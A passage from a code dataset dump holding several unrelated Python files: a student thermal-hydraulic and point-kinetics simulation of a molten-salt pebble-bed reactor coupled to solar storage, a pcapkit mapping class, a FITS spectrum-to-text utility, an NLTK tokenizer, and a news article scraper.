IDfuelContainer**2))/(math.pi*(IDfuelContainer+ODfuelcontainer)) # meter the hydraulic diamter of the reactor\r\nACore =(math.pi/4)*(ODfuelcontainer**2 - IDfuelContainer**2) # m^2 the area of the core\r\nAout = .25 # m^2 the outlet arwa of the core\r\nNpebbles = 441000\r\nHreflector = [0.3,0.6,0.9,1.2,1.5,1.8,2.1,2.4,2.7,3.0] #meters Hieght of the total reactor core for profiles\r\nPebbleD 
= 0.03 # meters diameter of the fuel pebble\r\nSurfaceP = 4*math.pi*(PebbleD/2)**2\r\nTotSurf = SurfaceP*Npebbles\r\nh = 16000*TotSurf# W/K heat transfer area considering pebble surface area, initial estimate\r\nF1 = 0.05 # friction factor of the pebble bed reactor with a porosity of approximately .3-.4\r\nK =1700# constant value when solving out the frictional pressure drop integration solved from annular system of equations\r\ng = 9.81 #m/s^2 as the graviational constant\r\nu0 = 0.65 # initialized inlet velocity of the core\r\nporosity = .4 # constant porosity of the reactor\r\nDelP = 66300 # initialized pressure drop over reactor core\r\n\r\nT_cine = 600+273 # kelvin, initialized inlet temperature\r\nT_h_in = 750+273# kelvin, initialized outlet temperature found from steady state conditions\r\nmdot_h = 1319 # kg/s, initialized mass flow rate from stead state conditions\r\nb = 1/T_cine # K^-1, thermal expansion coefficent based on the ilet temperature of the core\r\nrho_h= 2518-0.406*(T_cine) #density in kg/m^3 in core\r\nmu_h= 0.000116*np.exp(3755/T_cine) #viscosity in Pa*s in core\r\nc_ph= 2415.78 #specific heat in J/kg*K in core\r\nk_h= 0.629697+0.0005*(T_cine) #thermal conductivity in W/mK in core\r\n\r\n\r\ndef dydt(t,y, params):\r\n x, y, z_f, z_c=y\r\n alpha,lamb,beta,c_pf,c_pc,m_f,m_c,mdot_h,T_cine,a_f,n_e,alpha_f,alpha_c,h=params\r\n\r\n T_fe=T_cine+(1/(2*mdot_h*c_pc)+(1/h))*a_f*n_e #equillibrium of fuel temp\r\n T_ce=T_cine+(a_f*n_e/(2*mdot_h*c_pc)) #equillibrium of coolant temp\r\n u=(T_cine-T_cine)/T_cine\r\n w=(1300-mdot_h)/mdot_h\r\n Power = 1 #percentage\r\n p_c=(Power-(x))*10\r\n p=p_c+alpha_c*T_ce*z_c+alpha_f*T_fe*z_f\r\n \r\n \r\n dydt1 = -(beta*x/alpha)+(beta*y/alpha)+(p/alpha)+(p*x/alpha)\r\n dydt2 = (x-y)*lamb\r\n dydt3 = ((a_f*n_e*x)/(m_f*c_pf*T_fe))-(h*z_f/(m_f*c_pf))+(h*T_ce*z_c/(m_f*c_pf*T_fe))\r\n dydt4 = (h*T_fe*z_f/(m_c*c_pc*T_ce))-((2*c_pc*mdot_h+h)*z_c/(m_c*c_pc))+((2*mdot_h*T_cine*u)/(m_c*T_ce))\r\n -(2*mdot_h*w*(T_ce-T_cine)/(m_c*T_ce))-(2*mdot_h*w*z_c/m_c)+(2*mdot_h*T_cine*u*w/(m_c*T_ce))\r\n \r\n derivs=[dydt1, dydt2, dydt3, dydt4]\r\n\r\n return derivs, p\r\n\r\ndef tempoutput(params2):\r\n c_pc,mdot_h,T_cine,a_f,h,finaltempchange = params2\r\n T_fe = T_cine+(1/(2*mdot_h*c_pc)+(1/h))*a_f*n_e #equillibrium of fuel temp\r\n T_ce = T_cine+(a_f*n_e/(2*mdot_h*c_pc)) #equillibrium of coolant temp\r\n Tout = (T_fe-T_ce)/(Rf*mdot_h*c_pc) + T_ce + finaltempchange\r\n power = mdot_h*c_pc*(Tout-T_cine)\r\n return Tout, power, T_cine, T_fe, T_ce\r\n\r\n\"\"\"takes data from the solar power data file for the mwe being produced by the solar power,\r\n the corresponding mass flow rate of the reactors heat exchanger on the cold side,\r\n and the reactivity table for ranging values of the power which change according to\r\n the amount of power being produced by the solar power data\"\"\"\r\n# \r\nMyData = pd.read_excel(\"Solar_Power_Data.xlsx\", sheet_name = \"CloudTransient(SolP)\") #extracting values of solar power generated in 10 min steps\r\n#MyData1 = pd.read_excel(\"C:/Users/Yugi/Documents/Senior Design 2/Solar_Power_Data.xlsx\", sheet_name = \"Sheet4\")#extracting values of reactivity inserted for corresponding solar power 10 min steps\r\nMyData2 =pd.read_excel(\"Solar_Power_Data.xlsx\", sheet_name = \"CloudTransient(ReactorM)\")# extracting mass flow rate values for each 10 min cycle on the cold side of the heat exchanger\r\nMyData3 =pd.read_excel(\"Solar_Power_Data.xlsx\", sheet_name = \"CloudTransient(SolM)\")\r\ndf = MyData.values.tolist()\r\n#df1 = 
MyData1.values.tolist()\r\ndf2 = MyData2.values.tolist()\r\ndf3 = MyData3.values.tolist()\r\n#\r\nmergedf = list(itertools.chain.from_iterable(df))\r\n#mergedf1 =list(itertools.chain.from_iterable(df1))\r\nmergedf2 = list(itertools.chain.from_iterable(df2))\r\nmergedf3 = list(itertools.chain.from_iterable(df3))\r\n#\r\nSolarPower = mergedf[0:90]\r\n#Reactivity =mergedf1[3:80:5]\r\nmdot_cA =mergedf2[0:90]\r\nmdot_solar = mergedf3[0:90]\r\n\r\nfor j in range(90):\r\n\r\n# if SolarPower[j] < 50:\r\n# n_e = 230.05 \r\n# if 50 <= SolarPower[j] <100: \r\n# deln_e = 172.25*(Reactivity[0]**2) +204.19*Reactivity[0]+0.0517\r\n# n_e =200 + deln_e\r\n# if 100 <=SolarPower[j] <150:\r\n# deln_e = 172.25*(Reactivity[1]**2) +204.19*Reactivity[1]+0.0517\r\n# n_e =200 + deln_e \r\n# if 150 <= SolarPower[j] <200:\r\n# deln_e = 172.25*(Reactivity[2]**2) +204.19*Reactivity[2]+0.0517\r\n# n_e =200 + deln_e \r\n# if 200 <= SolarPower[j] <250:\r\n# deln_e = 172.25*(Reactivity[3]**2) +204.19*Reactivity[3]+0.0517\r\n# n_e =200 + deln_e \r\n# if 250 <= SolarPower[j] < 300:\r\n# deln_e = 172.25*(Reactivity[4]**2) +204.19*Reactivity[4]+0.0517\r\n# n_e =200 + deln_e \r\n# if 300 <= SolarPower[j] <350:\r\n# deln_e = 172.25*(Reactivity[5]**2) +204.19*Reactivity[5]+0.0517\r\n# n_e =200 + deln_e \r\n# if 350 <= SolarPower[j] <400:\r\n# deln_e = 172.25*(Reactivity[6]**2) +204.19*Reactivity[6]+0.0517\r\n# n_e =200 + deln_e \r\n# if 400<= SolarPower[j] < 450:\r\n# deln_e = 172.25*(Reactivity[7]**2) +204.19*Reactivity[7]+0.0517\r\n# n_e =200 + deln_e \r\n# if 450<= SolarPower[j] < 500:\r\n# deln_e = 172.25*(Reactivity[8]**2) +204.19*Reactivity[8]+0.0517\r\n# n_e =200 + deln_e \r\n# if 500 <= SolarPower[j] < 550:\r\n# deln_e = 172.25*(Reactivity[9]**2) +204.19*Reactivity[9]+0.0517\r\n# n_e =200 + deln_e \r\n# if 550<= SolarPower[j] < 600:\r\n# deln_e = 172.25*(Reactivity[10]**2) +204.19*Reactivity[10]+0.0517\r\n# n_e =200 + deln_e \r\n# if 600 <= SolarPower[j] <=700:\r\n# deln_e = 172.25*(Reactivity[11]**2) +204.19*Reactivity[11]+0.0517\r\n# n_e =200 + deln_e \r\n \r\n if mdot_solar[j] < 90:\r\n deln_e = -117\r\n n_e = 200 +deln_e\r\n if 90 <= mdot_solar[j] <195: \r\n deln_e = -127\r\n n_e =200 + deln_e\r\n if 195 <= mdot_solar[j] <295: \r\n deln_e = -135\r\n n_e =200 + deln_e \r\n if 295 <=mdot_solar[j] <395:\r\n deln_e = -142\r\n n_e =200 + deln_e \r\n if 395<= mdot_solar[j] <495:\r\n deln_e = -155\r\n n_e =200 + deln_e \r\n if 495 <= mdot_solar[j]<595:\r\n deln_e = -160\r\n n_e =200 + deln_e \r\n if 595 <= mdot_solar[j] < 695:\r\n deln_e = -167\r\n n_e =200 + deln_e \r\n if 695 <= mdot_solar[j] <795:\r\n deln_e = -175\r\n n_e =200 + deln_e \r\n if 795 <= mdot_solar[j] <850:\r\n deln_e = -175\r\n n_e =200 + deln_e \r\n if 850 <= mdot_solar[j] <895:\r\n deln_e = -190\r\n n_e =200 + deln_e \r\n if 895 <= mdot_solar[j]<995:\r\n deln_e = -191\r\n n_e =200 + deln_e \r\n '''Initial parameters of the core'''\r\n PebbleN = 441000 # number of pebbles in core\r\n alpha=0.001\r\n lamb=0.1\r\n beta=7.5*10**-3\r\n c_pf=717 #specific heat of graphite moderator\r\n c_pc=2414.7 #specific heat of FliBE\r\n m_f=PebbleN*(1.5/1000) #mass of u235 in 470,000 pellets\r\n m_c=90830.8 #mass of coolant\r\n a_f=7.0e6\r\n alpha_f=-5.4e-6 #Change in reactivity based on temp of fuel\r\n alpha_c=-1.8e-5 #Change in reactivity based on temp for moderator\r\n Rf = .0005 #fouling factor \r\n \r\n params=[alpha,lamb,beta,c_pf,c_pc,m_f,m_c,mdot_h,T_cine,a_f,n_e,alpha_f,alpha_c,h]\r\n x0=0.0 #starting neutron pop\r\n y0=0.0 #starting precursors\r\n z_f0=1.0 
#starting fuel temp try changing to 0\r\n z_c0=1.0 #starting moderator temp\r\n y0=[x0,y0,z_f0,z_c0]\r\n t0=0\r\n A=[]\r\n \r\n # Solver\r\n r = ode(dydt).set_integrator('dopri5', method='nsteps')\r\n r.set_initial_value(y0, t0).set_f_params(params)\r\n '''run each cycle for an arbitrary volume of fluid over 1 minute through 1 cycle'''\r\n t1 =1.0\r\n dt = 0.01\r\n T=[]\r\n while r.successful() and r.t < t1:\r\n r.integrate(r.t+dt)\r\n T=np.append(T,r.t)\r\n A=np.append(A,r.y)\r\n #print np.size(A)\r\n B= A.reshape(np.size(T),4)\r\n \r\n finaltempchange = sum(B[:,3])\r\n \"\"\" these append the values of needed variables after each ten minute cycle\"\"\" \r\n params2 = [c_pc,mdot_h,T_cine,a_f,h,finaltempchange] \r\n Power.append(tempoutput(params2)[1]/1e6)\r\n Powere.append(tempoutput(params2)[1]/(1e6*2.222))\r\n FuelT.append(tempoutput(params2)[3])\r\n InletTemp.append(tempoutput(params2)[2])\r\n finaltemps.append(tempoutput(params2)[0])\r\n MdotO.append(mdot_h)\r\n Htransfer.append(h)\r\n NeutronD.append(B[:,0])\r\n '''Solving for the velocity, Total Heat transfer ocefficinet in the core, \r\n and mass flow rate of the reactor''' \r\n \r\n\r\n Vavg = math.sqrt((g*b*Hreflector[9]**2*(finaltemps[j]-T_cine)*rho_h*ACore*u0)/(Hreflector[9]*(1+K+(F1*Hreflector[9]/PebbleD)))) # average velocity through core solving continuity equation w/ assumptions\r\n \r\n Recore = (Vavg*PebbleD*rho_h)/(mu_h) #Re number through porous bed\r\n Prcore = (mu_h*c_ph)/k_h # the prandtl number of the coolant\r\n Nucore = 2+1.1*(Prcore**(1/3))*(Recore**(.6)) # nusselt value for Re>50 por=.35-.4\r\n h_FLiBe = (6*(1-porosity)*k_h*Nucore*TotSurf)/PebbleD # W/(K)Thermal convection Coefficient\r\n h=h_FLiBe #setting H value in ODE to the h value determined from fluid mechanics\r\n mdot_h= Vavg*rho_h*Aout #mass flow rate in kg/s \r\n \r\n V.append(Vavg)\r\n \r\n \"\"\"Setting the input and output temperatures of the cold side heat exchanger\"\"\"\r\n T_h_in= finaltemps[j] #ALL TEMPERATURES LISTED IN KELVIN, K \r\n T_c_in= 450\r\n T_c_out= 700\r\n \r\n \r\n #FLUID PROPERTIES -- FLiBe (shellside hot)\r\n \r\n rho_h= 2518-0.406*(T_h_in+T_c_in)/2 #density in kg/m^3\r\n mu_h= 0.000116*np.exp(3755/((T_h_in+T_c_in)/2)) #viscosity in Pa*s\r\n c_ph= 2415.78 #specific heat in J/kg*K\r\n k_h= 0.629697+0.0005*((T_h_in+T_c_in)/2) #thermal conductivity in W/mK\r\n b = 1/T_cine\r\n \r\n ''' Gives the pressure drop and velocity profile over each cycle'''\r\n DelP = (rho_h/2)*(Vavg**2 - u0**2) + rho_h*g*Hreflector[9] - rho_h*(1-b*(finaltemps[j]-T_cine))\r\n F1 = (DelP/Hreflector[9])*(PebbleD**2/Vavg**2)*(porosity**3/(1-porosity)**2)\r\n Delp.append(DelP)\r\n# for i in range(9):\r\n# Vh = math.sqrt((g*b*Hreflector[i]**2*(finaltemps[j]-T_cine)*rho_h*ACore*u0)/(Hreflector[i]*(1+K+((DelP/Hreflector[i])*(PebbleD**2/Vavg**2)*(porosity**3/(1-porosity)**2)*Hreflector[i]/PebbleD)))) # average velocity through core solving continuity equation w/ assumptions\r\n# Vprofile.append(Vh)\r\n \r\n CHOICE= 1\r\n #FLUID PROPERTIES -- Solar Salt (tubeside cold)\r\n \r\n rho_c= 1804\r\n mu_c= 0.00169\r\n c_pc= 1520 \r\n k_c= 0.53\r\n Pr_c= 4.85\r\n \r\n #TUBE PROPERTIES \r\n \r\n d_o= 0.02 #outer tube diameter in m \r\n t_w= 0.001 #tube wall thickness \r\n d_i= d_o-2*t_w #inner tube diameter \r\n \r\n #GUESSES \r\n \r\n U= 100\r\n U_guess= 200 #Overall HT Coefficient in W/m^2*K\r\n v_tube_guess= 1.5 #Tube velocity in m/s \r\n #Energy Balance \r\n \"\"\" setting values of the cold side heat exchanger mass flow rate\"\"\"\r\n #mass flow rate in kg/s \r\n 
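# steady-state energy balance over the IHE: Qdot = mdot_c*c_pc*(T_c_out - T_c_in),\r\n    # so the hot side leaves at T_h_out = T_h_in - Qdot/(mdot_h*c_ph) and feeds back as T_cine\r\n    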
mdot_c=mdot_cA[j]\r\n Qdot= (mdot_cA[j])*c_pc*(T_c_out-T_c_in)\r\n T_h_out= T_h_in-mdot_c*c_pc*(T_c_out-T_c_in)/(mdot_h*c_ph)\r\n T_cine = T_h_out\r\n Q.append(Qdot)\r\n\r\n#Vprof= np.reshape(Vprofile, (145,9)).T\r\n#Vprof1 = Vprof[0:120:1]\r\n#Vprof2 = Vprof[0:120:1]\r\n#Vprof3 = Vprof[0:120:1]\r\n#Vprof4 = Vprof[0:120:1]\r\n#Vprof5 = Vprof[0:120:1]\r\n#Vprof6 = Vprof[0:120:1]\r\n#Vprof7 = Vprof[0:120:1]\r\n#Vprof8 = Vprof[0:120:1]\r\n#Vprof9 = Vprof[0:120:1]\r\n#Vprof10 = Vprof[0:120:1]\r\n#Vprof11 = Vprof[0:120:1]\r\n#Vprof12 = Vprof[0:120:1]\r\n#Vprof13 = Vprof[0:120:1]\r\n\r\nnp.savetxt(\"Solar.csv\", mdot_solar) \r\nnp.savetxt(\"Reactor.csv\", mdot_cA) \r\n\r\n'''plotting the inlet and outlet temperature of the reactor according to changes in power and mass flow rate'''\r\nplt.figure(1) \r\nplt.plot(InletTemp, label = 'Inlet') \r\nplt.plot(finaltemps, label = 'Outlet')\r\nplt.xlabel('Cycles')\r\nplt.ylabel('Temperature(Kelvin)')\r\nplt.title('Inlet & Outlet Temperature of Reactor')\r\nax = plt.subplot(111) \r\nax.legend()\r\n'''plotting the power change over each cycle of 20 minutes'''\r\nplt.figure(2) \r\nplt.plot(Power, label= ' Reactor(MWth)')\r\nplt.plot(SolarPower, label= ' Solar(MWe)')\r\nplt.xlabel('Cycles=(10min/cycle)')\r\nplt.ylabel('Power(MW)')\r\nplt.title('Power')\r\nax = plt.subplot(111) \r\nax.legend()\r\n\"\"\"plots the average mass flow rate in the core\"\"\"\r\nplt.figure(3) \r\nplt.plot(MdotO, label= 'Reactor ')\r\nplt.plot(mdot_solar, label='Solar')\r\nplt.plot(mdot_cA, label = 'Reactor IHE' )\r\nplt.xlabel('Cycles')\r\nplt.ylabel('mdot(kg/s)')\r\nplt.title('Mass Flow rate')\r\nax = plt.subplot(111) \r\nax.legend()\r\n\"\"\"plots the heat transfer coefficient in the core\"\"\"\r\nplt.figure(4) \r\nplt.plot(Htransfer, label= 'Reactor H')\r\nplt.xlabel('Cycles')\r\nplt.ylabel('h(W/K)')\r\nplt.title('Heat transfer coeff. for Total Surface Area')\r\nax = plt.subplot(111) \r\nax.legend()\r\n#\"\"\"plots the normalized neutron density in the core\"\"\"\r\n#plt.figure(5) \r\n#plt.plot(NeutronD, label= 'Normalized neutron Density')\r\n#plt.xlabel('Cycles')\r\n#plt.ylabel('X0')\r\n#plt.title('Neutron Density')\r\n#ax = plt.subplot(111) \r\n#ax.legend()\r\n\"\"\" plots the heat transfer of the intermediate heat exchanger attatched to thermal energy storage system\"\"\"\r\nplt.figure(6) \r\nplt.plot(Q, label= 'IHE heat tansfer')\r\nplt.xlabel('Cycles')\r\nplt.ylabel('Q(W)')\r\nplt.title('Heat Transferred from IHE into TES')\r\nax = plt.subplot(111) \r\nax.legend()\r\n\"\"\"plots the velocity profile of the core for each cycle\"\"\"\r\nplt.figure(7) \r\nplt.plot(V, label= 'Average Velocity')\r\nplt.xlabel('24 hours(1 min interval)')\r\nplt.ylabel('V(m/s)')\r\nplt.title('Velocity inside Reactor')\r\nax = plt.subplot(111) \r\nax.legend()\r\n\r\n#plt.figure(8) \r\n#plt.plot(Vprof)\r\n#plt.xlabel('axial profile over H=3(m)')\r\n#plt.ylabel('V(m/s)')\r\n#plt.title('Velocity in Reactor over 24 hours')\r\n#ax = plt.subplot(111) \r\n#ax.legend()\r\n\"\"\"plots the pressure drop along the reactor core\"\"\"\r\nplt.figure(9) \r\nplt.plot(Delp, label= 'pressure drop')\r\nplt.xlabel('cycles')\r\nplt.ylabel('DelP(Pa)')\r\nplt.title('Pressure drop inside of reactor Core')\r\nax = plt.subplot(111) \r\nax.legend()\r\n\r\n\"\"\"plots the equilibrium fuel temperature of the core\"\"\"\r\nplt.figure(10) \r\nplt.plot(FuelT, label= 'Fuel Temp.')\r\nplt.xlabel('cycles')\r\nplt.ylabel('Temperature(kelvin)')\r\nplt.title('Equilibrium Fuel Temp. 
of Reactor')\r\nax = plt.subplot(111) \r\nax.legend()","sub_path":"system/Woody_CloudTransientControl.py","file_name":"Woody_CloudTransientControl.py","file_ext":"py","file_size_in_byte":16947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"361531837","text":"# -*- coding: utf-8 -*-\n\"\"\"info class\n\n:mod:`pcapkit.corekit.infoclass` contains :obj:`dict` like class\n:class:`~pcapkit.corekit.infoclass.Info` only, which is originally\ndesigned to work alike :func:`dataclasses.dataclass` as introduced\nin :pep:`557`.\n\n\"\"\"\nimport collections.abc\nimport copy\n\nfrom pcapkit.utilities.exceptions import UnsupportedCall\nfrom pcapkit.utilities.validations import dict_check\n\n__all__ = ['Info']\n\n\nclass Info(collections.abc.Mapping):\n \"\"\"Turn dictionaries into :obj:`object` like instances.\n\n Notes:\n * :class:`Info` objects inherit from :obj:`dict` type\n * :class:`Info` objects are *iterable*, and support all functions as :obj:`dict`\n * :class:`Info` objects are **one-time-modeling**, thus cannot set or delete\n attributes after initialisation\n\n \"\"\"\n\n def __new__(cls, dict_=None, **kwargs):\n \"\"\"Create a new instance.\n\n Args:\n dict_ (Dict[str, Any]): Source :obj:`dict` data.\n\n Keyword Args:\n **kwargs: Arbitrary keyword arguments.\n\n Notes:\n Keys with the same names as the builtin methods will be renamed\n with ``2`` suffix implicitly and internally.\n\n \"\"\"\n def __read__(dict_):\n __dict__ = dict()\n for (key, value) in dict_.items():\n if key in self.__data__:\n key = f'{key}2'\n if isinstance(value, dict):\n __dict__[key] = Info(value)\n else:\n # if isinstance(key, str):\n # key = re.sub(r'\\W', '_', key)\n __dict__[key] = value\n return __dict__\n\n temp = list()\n for obj in cls.mro():\n temp.extend(dir(obj))\n cls.__data__ = set(temp)\n\n self = super().__new__(cls)\n if dict_ is not None:\n if isinstance(dict_, Info):\n self = copy.deepcopy(dict_)\n else:\n dict_check(dict_)\n self.__dict__.update(__read__(dict_))\n\n self.__dict__.update(__read__(kwargs))\n return self\n\n def __str__(self):\n temp = list()\n for (key, value) in self.__dict__.items():\n temp.append(f'{key}={value}')\n args = ', '.join(temp)\n return f'Info({args})'\n\n def __repr__(self):\n temp = list()\n for (key, value) in self.__dict__.items():\n if isinstance(value, Info):\n temp.append(f'{key}=Info(...)')\n else:\n temp.append(f'{key}={value!r}')\n args = ', '.join(temp)\n return f\"Info({args})\"\n\n def __len__(self):\n return len(self.__dict__)\n\n def __iter__(self):\n return iter(self.__dict__)\n\n def __getitem__(self, key):\n if key in self.__data__:\n key = f'{key}2'\n value = self.__dict__[key]\n if isinstance(value, (dict, collections.abc.Mapping)):\n return Info(value)\n return value\n\n def __setattr__(self, name, value):\n raise UnsupportedCall(\"can't set attribute\")\n\n def __delattr__(self, name):\n raise UnsupportedCall(\"can't delete attribute\")\n\n def info2dict(self):\n \"\"\"Convert :class:`Info` into :obj:`dict`.\n\n Returns:\n Dict[str, Any]: Converted :obj:`dict`.\n\n \"\"\"\n dict_ = dict()\n for (key, value) in self.__dict__.items():\n if isinstance(value, Info):\n dict_[key] = value.info2dict()\n elif isinstance(value, (tuple, list, set, frozenset)):\n temp = list()\n for item in value:\n if isinstance(item, Info):\n temp.append(item.info2dict())\n else:\n temp.append(item)\n dict_[key] = value.__class__(temp)\n else:\n dict_[key] = value\n return 
dict_\n","sub_path":"pcapkit/corekit/infoclass.py","file_name":"infoclass.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"396194576","text":"from __future__ import print_function\nfrom astropy.io import fits\nimport numpy as np\nimport os\nimport csv\nimport sys\n\n\ndef fitstotxt(target, filepath, writepath, xmin, xmax):\n \"\"\"\n Reads a FITS file, applies barycentric and cloud corrections\n and writes a subsection within a given range to a .txt file.\n\n input:\n sightline\n path/to/fits/database/\n path/to/write/folder\n range max\n range min\n\n output:\n .txt file of spectrum within given range, tab separated, in a given folder.\n\n example output:\n\n # HD144470\n # Wavelength(1/cm) Relative Intensity\n 3303.1797537322504 1.0084753\n 3303.199755852153 1.0125096\n 3303.219757972055 1.012984\n 3303.2397600919576 1.0122045\n\n example:\n\n fitstotxt('HD144470', '/data/DR3_fits/', '/home/txtfiles/, 6610, 6618)\n\n \"\"\"\n\n c = 2.99 * (10 ** 8) # m/s\n\n arms = [\"BLUE_346\", \"BLUE_437\", \"REDL_564\", \"REDU_564\", \"REDL_860\", \"REDU_860\"]\n\n if xmin <= 3876:\n l1 = 0\n if xmin <= 4990 and xmin >= 3754:\n l1 = 1\n if xmin <= 5667.9 and xmin >= 4616:\n l1 = 2\n if xmin <= 6693.9 and xmin >= 5668:\n l1 = 3\n if xmin <= 8649.9 and xmin >= 6694:\n l1 = 4\n if xmin >= 8650:\n l1 = 5\n\n if xmax <= 3876:\n l2 = 0\n if xmax <= 4990 and xmax >= 3754:\n l2 = 1\n if xmax <= 5667.9 and xmax >= 4616:\n l2 = 2\n if xmax <= 6693.9 and xmax >= 5668:\n l2 = 3\n if xmax <= 8649.9 and xmax >= 6694:\n l2 = 4\n if xmax >= 8650:\n l2 = 5\n\n if l1 == l2:\n warm = [arms[l1]]\n if l1 != l2:\n warm = arms[l1:l2]\n\n for i in range(len(warm)):\n os.chdir(filepath)\n loc = filepath + target + \"/\" + warm[i] + \"/\"\n if warm[i] == \"REDL_564\" or warm[i] == \"REDU_564\":\n loc = filepath + target + \"/RED_564\" + \"/\"\n if warm[i] == \"REDL_860\" or warm[i] == \"REDU_860\":\n loc = filepath + target + \"/RED_860\" + \"/\"\n\n if os.path.isdir(loc) is False:\n print(\"This object have not been observed yet!\")\n return ()\n os.chdir(loc)\n\n # Min and Max values used in order to shift based on interstellar NaI\n\n NaIxmin = 3301.0\n NaIxmax = 3305.0\n # NaIxmin = 5895\n # NaIxmax = 5897.5\n\n # ymin = 0.5\n # ymax = 1\n\n lambda_res = 3302.8\n # lambda_res = 5897.5\n\n # first_peak_index = []\n # second_peak_index = []\n # third_peak_index = []\n visible_x = []\n x_to_plot = []\n visible_y = []\n y_to_plot = []\n points = []\n DIB_x = []\n DIB_y = []\n\n # file_list = [os.path.basename(q) for q in glob.glob(path + '*.fits')]\n path = loc\n file_list = os.listdir(path)\n\n for file_number in range(len(file_list)):\n\n file_name = file_list[file_number]\n\n if file_name.split(\".\")[-2] == \"fits\":\n\n hdulist = fits.open(path + file_name)\n hdu = hdulist[0]\n data_towork = hdu.data\n first_val = hdu.header[\"CRVAL1\"]\n stepsize = hdu.header[\"CDELT1\"]\n final_val = first_val + (stepsize * len(data_towork))\n x = np.linspace(first_val, final_val, len(data_towork))\n bcf = hdu.header[\"HIERARCH ESO QC VRAD BARYCOR\"]\n\n # Analyze the NaI lines to get the proper shift\n for i in range(0, len(data_towork)):\n if NaIxmin <= x[i] <= NaIxmax:\n visible_x.append(x[i])\n visible_y.append(data_towork[i])\n if xmin <= x[i] <= xmax:\n DIB_x.append(x[i])\n DIB_y.append(data_towork[i])\n else:\n continue\n\n if len(visible_x) == 0:\n continue\n else:\n x_to_plot.extend(visible_x)\n y_to_plot.extend(visible_y)\n\n 
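# pair each wavelength with its intensity so the pairs stay aligned when sorted\n                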
for j in range(0, len(x_to_plot)):\n point = (((x_to_plot[j])), (y_to_plot[j]))\n points.append(point)\n points.sort()\n\n bary_corr = 1 + (bcf / c)\n\n xpoint = [x[0] for x in points]\n ypoint = [y[1] for y in points]\n lowest_min = np.argmin(ypoint / max(ypoint))\n lambda_obs = xpoint[lowest_min]\n cloud_vel = c * (lambda_obs - lambda_res) / lambda_res\n cloud_vel_corr = 1 - (cloud_vel / c)\n\n # correction for wavelenth taking into account barycentric velocity and cloud velocity.\n total_wavelength_correction = bary_corr * cloud_vel_corr\n\n # Scale the data in order to view desired DIB\n\n DIB_plot_x = [total_wavelength_correction * x_val for x_val in DIB_x]\n DIB_plot_y_1 = [(y / max(DIB_y)) for y in DIB_y]\n a = np.mean(DIB_plot_y_1[:25])\n DIB_plot_y = DIB_plot_y_1 / a\n NaI_plot_x = [total_wavelength_correction * x_val for x_val in xpoint]\n NaI_plot_y = [y / max(ypoint) for y in ypoint]\n\n # write to .txt file\n os.chdir(writepath)\n f = open(target + \"_subrange.txt\", \"w+\")\n f.write(\"# \" + target)\n f.write(\"\\n\")\n title = \"# Wavelength(1/cm) Relative Intensity \\n\"\n f.write(title)\n\n writer = csv.writer(f, delimiter=\"\\t\")\n writer.writerows(zip(DIB_plot_x, DIB_plot_y))\n\n f.close()\n\n\n# fullCmdArguments = sys.argv\n# args = fullCmdArguments[1:]\n# arN = len(sys.argv)\n\n# print(args)\n# if len(args) != 5:\n# print('\\nSyntax: python fitsto2dtxt.py target, filepath, writepath, xmin, xmax\\n')\n\n# else:\n# fitstotxt(args[0], args[1], args[2], args[3], args[4])\n","sub_path":"edibles/utils/old/fitsto2dtxt.py","file_name":"fitsto2dtxt.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"563901176","text":"import sys\nimport nltk\nimport re\nfrom nltk.tokenize import word_tokenize\nfrom nltk import sent_tokenize\n\ninfile = sys.argv[1]\noutfile = sys.argv[2]\n\ndef my_sent_tokenizer(infile, outfile):\n\n '''open file and turn it into a string'''\n\n with open(infile, 'r') as myfile:\n\n read_string = myfile.read()\n\n sentences = sent_tokenize(read_string)\n\n dataset = open(outfile, 'w')\n\n for i in sentences:\n\n dataset.write(i+'\\n')\n\n dataset.close()\n\ndef my_word_tokenizer(infile, outfile):\n\n with open(infile, 'r') as worktext:\n\n\n # read_text = worktext.read()\n with open(outfile, 'w') as tokens:\n for sent in worktext:\n sent = word_tokenize(sent)\n for i in sent:\n tokens.write(i+' ')\n tokens.write('\\n')\n\n\ndef data_cleanup(dataset, output):\n with open(dataset, 'r')as datatext:\n read = set(datatext.readlines())\n print(type(read), len(read))\n\n with open(output, 'w') as outfile:\n # lines =[]\n\n for line in read:\n line = re.sub(r'[\\(\\)\\[\\]\\-\\:\\;\\d]','',line)\n line = re.sub(r'\\.\\.\\.','.', line)\n line = re.sub(r'\\bhttps?\\/\\/.*[\\r\\n]*', '', line)\n line = re.sub(r'\\= \\.', '', line)\n line = re.sub(r'[%+≤-]','',line)\n line = re.sub(r'([\\,\\.]) [\\.\\,]+', '\\1', line)\n line = re.sub(r'\\s*\\-\\.\\s*','', line)\n line = re.sub(r'', '', line)\n\n if len(line)>10:\n\n outfile.write(line)\n\n outfile.close()\n\n\n# my_sent_tokenizer(infile, outfile)\n# my_word_tokenizer(infile, outfile)\ndata_cleanup(infile, outfile)\n","sub_path":"tokenizer_simplestyle.py","file_name":"tokenizer_simplestyle.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"65002995","text":"import urllib2\nfrom bs4 import BeautifulSoup as BS\n\ndef 
getOnlyTextWP(url):\n # Uses urllib to download html page and BS to scrape out the text we want\n page = urllib2.urlopen(url).read().decode('utf8')\n # open the page\n soup = BS(page, 'html.parser')\n # dump the contents to the page\n text = ' '.join(map(lambda p: p.text, soup.find_all('article')))\n # use the code to get all the text that lies between the
<article> stuff </article>\n    # HTML tags. This is specific to the URL here (Washington Post) and will change\n    # depending on the website.\n    soup2 = BS(text, 'html.parser')\n    # Now that we have the article. Pare this down to the actual text between the \n    # <p> </p> paragraph tags. Again, this is dependent on the website's conventions.\n    text = ' '.join(map(lambda p: p.text, soup2.find_all('p')))\n    return soup.title.text, text\n    # This will take a URL that corresponds to the following format:\n    # <title> Article Headline </title> \n    # <body> [stuff] <p> para 1 </p> <p> para 2 </p> </body>
